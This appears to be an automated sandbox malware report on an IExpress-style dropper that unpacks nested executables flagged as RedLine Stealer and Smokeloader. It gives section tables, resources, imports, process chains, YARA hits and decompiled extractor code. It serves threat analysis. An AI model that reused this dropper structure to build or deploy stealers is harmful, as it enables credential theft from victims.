.rsrc	0xc000	0xc9000	0xc8c00	False	0.962984267979452	data	7.941202576330205	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd5000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xc9f8	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf814	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0xfe7c	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x10164	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States
RT_ICON	0x1034c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x10474	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x1131c	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x11bc4	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x1228c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x127f4	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x201c8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x22770	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x23818	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x241a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x24608	0x2f2	data	English	United States
RT_DIALOG	0x248fc	0x1b0	data	English	United States
RT_DIALOG	0x24aac	0x166	data	English	United States
RT_DIALOG	0x24c14	0x1c0	data	English	United States
RT_DIALOG	0x24dd4	0x130	data	English	United States
RT_DIALOG	0x24f04	0x120	data	English	United States
RT_STRING	0x25024	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States
RT_STRING	0x250b0	0x520	data	English	United States
RT_STRING	0x255d0	0x5cc	data	English	United States
RT_STRING	0x25b9c	0x4b0	data	English	United States
RT_STRING	0x2604c	0x44a	data	English	United States
RT_STRING	0x26498	0x3ce	data	English	United States
RT_RCDATA	0x26868	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x26870	0xad5fd	Microsoft Cabinet archive data, many, 710141 bytes, 2 files, at 0x2c +A "niba6073.exe" +A "l64fQ59.exe", ID 1861, number 1, 28 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0xd3e70	0x4	data	English	United States
RT_RCDATA	0xd3e74	0x24	data	English	United States
RT_RCDATA	0xd3e98	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xd3ea0	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xd3ea8	0x4	data	English	United States
RT_RCDATA	0xd3eac	0xc	data	English	United States
RT_RCDATA	0xd3eb8	0x4	data	English	United States
RT_RCDATA	0xd3ebc	0xd	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xd3ecc	0x4	data	English	United States
RT_RCDATA	0xd3ed0	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xd3ed8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xd3ee0	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0xd3ee8	0xbc	data	English	United States
RT_VERSION	0xd3fa4	0x408	data	English	United States
RT_MANIFEST	0xd43ac	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: pYHrqNhFKr.exePID: 2980, Parent PID: 3452

General

Target ID:	0
Start time:	21:04:36
Start date:	18/03/2023
Path:	C:\Users\user\Desktop\pYHrqNhFKr.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\pYHrqNhFKr.exe
Imagebase:	0x8a0000
File size:	856576 bytes
MD5 hash:	65CAB4A566B172D984C8F8EBFDBDFEA0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.241248149.0000000004BCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: niba6073.exePID: 2968, Parent PID: 2980

General

Target ID:	1
Start time:	21:04:36
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\niba6073.exe
Imagebase:	0x70000
File size:	711680 bytes
MD5 hash:	7ED66C765EC9F99A5D8215486D6BC8C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 59%, ReversingLabs Detection: 57%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: niba2214.exePID: 5268, Parent PID: 2968

General

Target ID:	2
Start time:	21:04:37
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\niba2214.exe
Imagebase:	0x1250000
File size:	352256 bytes
MD5 hash:	6775BA3EF89ACFDA026F96DF54C2C21D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 59%, ReversingLabs Detection: 54%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: f7051zI.exePID: 5244, Parent PID: 5268

General

Target ID:	3
Start time:	21:04:37
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\f7051zI.exe
Imagebase:	0xca0000
File size:	11264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 408, Parent PID: 3452

General

Target ID:	4
Start time:	21:04:45
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff704b20000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: h99af07.exePID: 6132, Parent PID: 5268

General

Target ID:	5
Start time:	21:04:49
Start date:	18/03/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\h99af07.exe
Imagebase:	0x400000
File size:	341504 bytes
MD5 hash:	C8B5287FF76DDEC6B7F8C0DA94084603
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.307087402.0000000002E97000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.306344937.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Author: ditekSHen Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.306851644.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 5140, Parent PID: 3452

General

Target ID:	6
Start time:	21:04:54
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
Imagebase:	0x7ff704b20000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 1004, Parent PID: 3452

General

Target ID:	14
Start time:	21:05:03
Start date:	18/03/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
Imagebase:	0x7ff704b20000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: pYHrqNhFKr.exePID: 2980, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	28.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.1%
Total number of Nodes:	959
Total number of Limit Nodes:	24

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 008A3BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E008A3BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x8a8004; // 0x8481bc1d
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x8a9124 =  *0x8a9124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x8a8a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x8a8c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E008A468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E008A44B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x8a9124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E008A1AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E008A6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E008A3FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x8a8580;
													if( *0x8a8580 != 0) {
														E008A2267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x8a8180;
											if( *0x8a8180 == 0) {
												_t146 = 0x4c7;
												E008A44B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x8a9124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x8a9a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E008A6495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E008A44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x8a9124 = E008A6285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E008A44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x8a8a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x8a9a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x8a8a38 & 0x0000ffff;
											_v380 = 0x8a9154;
											_v376 = _t151;
											_v372 = 0x8a91e4;
											_v360 = _t97;
											if( *0x8a8a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x8a9a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x8a8d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x8a9a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x8aa288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x8a9124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x8a9a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x8a8a20;
										if( *0x8a8a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E008A202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E008A468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x8a8c42;
									if( *0x8a8c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x8a8a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E008A468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E008A468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E008A1781( &_v276, 0x104, _t130, 0x8a8c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E008A468F(_t130, 0x8a9a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}

0x008a3baa
0x008a3bb0
0x008a3bb7
0x008a3bc0
0x008a3bc2
0x008a3bc9
0x008a3bcb
0x008a3bcf
0x008a3bd3
0x008a3bd9
0x008a3bfd
0x008a3bfd
0x008a3bff
0x008a3c03
0x008a3c03
0x008a3c11
0x008a3c16
0x008a3c19
0x008a3c28
0x00000000
0x00000000
0x008a3c30
0x008a3c39
0x008a3c40
0x008a3d13
0x008a3d15
0x008a3d21
0x008a3d26
0x00000000
0x008a3c4f
0x008a3c56
0x008a3c60
0x008a3c65
0x008a3c77
0x008a3c78
0x008a3c7c
0x008a3c7e
0x008a3c82
0x008a3c82
0x00000000
0x008a3c7c
0x008a3c67
0x008a3c69
0x008a3c6d
0x00000000
0x008a3c58
0x008a3c58
0x008a3c6e
0x008a3c6e
0x008a3c87
0x008a3c89
0x008a3d4d
0x008a3d4f
0x008a3d50
0x008a3d52
0x008a3d9e
0x008a3da8
0x008a3daf
0x008a3db4
0x008a3db6
0x008a3f4d
0x008a3f4d
0x008a3f4f
0x008a3f56
0x008a3f57
0x008a3f58
0x008a3f63
0x008a3f63
0x008a3dbc
0x008a3dc0
0x008a3dc2
0x008a3de6
0x008a3de6
0x008a3de8
0x008a3f0b
0x008a3f0b
0x008a3f0f
0x008a3f13
0x008a3f15
0x008a3f1a
0x008a3f1c
0x008a3f46
0x008a3f47
0x00000000
0x008a3f47
0x008a3f1e
0x008a3f1f
0x008a3f25
0x008a3f26
0x008a3f2a
0x008a3f2d
0x008a3fd9
0x008a3fd9
0x008a3fda
0x008a3fda
0x008a3fe1
0x008a3fe3
0x008a3fe3
0x008a3fe8
0x00000000
0x008a3fe8
0x008a3f33
0x008a3f37
0x00000000
0x008a3f37
0x008a3dee
0x008a3dee
0x008a3df5
0x008a3fad
0x008a3fb9
0x008a3fc2
0x008a3fc8
0x00000000
0x008a3fc8
0x008a3dfb
0x008a3dfd
0x00000000
0x00000000
0x008a3e03
0x008a3e0a
0x00000000
0x00000000
0x008a3e15
0x008a3e17
0x008a3e19
0x008a3f94
0x008a3fa4
0x008a3f7c
0x008a3f80
0x008a3f8b
0x00000000
0x008a3f8b
0x008a3e2c
0x008a3e30
0x008a3e34
0x008a3e36
0x008a3f69
0x008a3f6e
0x008a3f70
0x008a3f76
0x00000000
0x008a3f76
0x008a3e3c
0x008a3e43
0x008a3e47
0x008a3e52
0x008a3e56
0x008a3e5c
0x008a3e61
0x008a3e68
0x008a3e70
0x008a3e74
0x008a3e7c
0x008a3e80
0x008a3e82
0x008a3e82
0x008a3e87
0x008a3e87
0x008a3e8b
0x008a3e91
0x008a3e94
0x008a3e96
0x008a3e96
0x008a3e9b
0x008a3e9b
0x008a3e9f
0x008a3ea2
0x008a3ea4
0x008a3ea4
0x008a3ea9
0x008a3ea9
0x008a3ead
0x008a3eb3
0x008a3eb6
0x008a3eb8
0x008a3eb8
0x008a3ebd
0x008a3ebd
0x008a3ec1
0x008a3ec3
0x008a3ec5
0x008a3ec5
0x008a3eca
0x008a3eca
0x008a3ece
0x008a3ed5
0x008a3ed9
0x008a3ee0
0x008a3ee6
0x008a3eea
0x008a3eec
0x008a3eee
0x008a3ef3
0x008a3ef3
0x008a3ef5
0x008a3efa
0x008a3efb
0x008a3efd
0x008a3f40
0x00000000
0x008a3eff
0x008a3eff
0x008a3f05
0x00000000
0x008a3f05
0x008a3efd
0x008a3dc7
0x008a3dce
0x00000000
0x00000000
0x008a3dd0
0x008a3dd7
0x00000000
0x00000000
0x008a3dd9
0x008a3ddb
0x00000000
0x00000000
0x008a3ddd
0x008a3de1
0x00000000
0x008a3de1
0x008a3d59
0x008a3d65
0x008a3d6a
0x008a3d6c
0x00000000
0x00000000
0x008a3d6e
0x008a3d75
0x00000000
0x00000000
0x008a3d8f
0x008a3d96
0x008a3d98
0x00000000
0x00000000
0x00000000
0x008a3d98
0x008a3c8f
0x008a3c98
0x008a3cf1
0x008a3cf3
0x00000000
0x00000000
0x008a3cfe
0x008a3d11
0x00000000
0x00000000
0x00000000
0x008a3d11
0x008a3c9c
0x008a3ca5
0x008a3ca7
0x00000000
0x00000000
0x008a3cad
0x008a3cb2
0x008a3cb7
0x008a3cc5
0x00000000
0x00000000
0x008a3ce8
0x008a3cec
0x008a3ced
0x008a3ced
0x00000000
0x008a3ce8
0x008a3c9e
0x00000000
0x008a3c9e
0x008a3c56
0x008a3d35
0x008a3d35
0x008a3d3c
0x008a3d48
0x00000000
0x008a3d48
0x008a3c03
0x008a3be2
0x008a3be7
0x008a3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 008A3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 008A3CDC

Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46A0
Part of subcall function 008A468F: SizeofResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46A9
Part of subcall function 008A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008A46C3
Part of subcall function 008A468F: LoadResource.KERNEL32(00000000,00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46CC
Part of subcall function 008A468F: LockResource.KERNEL32(00000000,?,008A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46D3
Part of subcall function 008A468F: memcpy_s.MSVCRT ref: 008A46E5
Part of subcall function 008A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008A46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,008A8C42), ref: 008A3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 008A3E26
FreeLibrary.KERNEL32(00000000,?,008A8C42), ref: 008A3EFF
LocalFree.KERNEL32(?,?,?,?,008A8C42), ref: 008A3F1F
FreeLibrary.KERNEL32(00000000,?,008A8C42), ref: 008A3F40
LocalFree.KERNEL32(?,?,?,?,008A8C42), ref: 008A3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,008A8C42), ref: 008A3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,008A8C42), ref: 008A3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,008A8C42), ref: 008A3FC2

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 008A3E74
RUNPROGRAM, xrefs: 008A3D05
DoInfInstall, xrefs: 008A3E1F, 008A3E24, 008A3F68
REBOOT, xrefs: 008A3BE2
siga30, xrefs: 008A3E68
<None>, xrefs: 008A3CC9, 008A3D7D
ADMQCMD, xrefs: 008A3C9E
USRQCMD, xrefs: 008A3CAD
advpack.dll, xrefs: 008A3F9D
D, xrefs: 008A3C19
SHOWWINDOW, xrefs: 008A3C34
POSTRUNPROGRAM, xrefs: 008A3D60

Memory Dump Source

Source File: 00000000.00000002.328018725.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.328011813.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328028862.00000000008A8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.328041935.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_pYHrqNhFKr.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$siga30
API String ID: 1032054927-2893038143
Opcode ID: 928cf7b6f95a11dc972728bd81f5b48d93bd954df1c3ed4750cad3a80a83f905
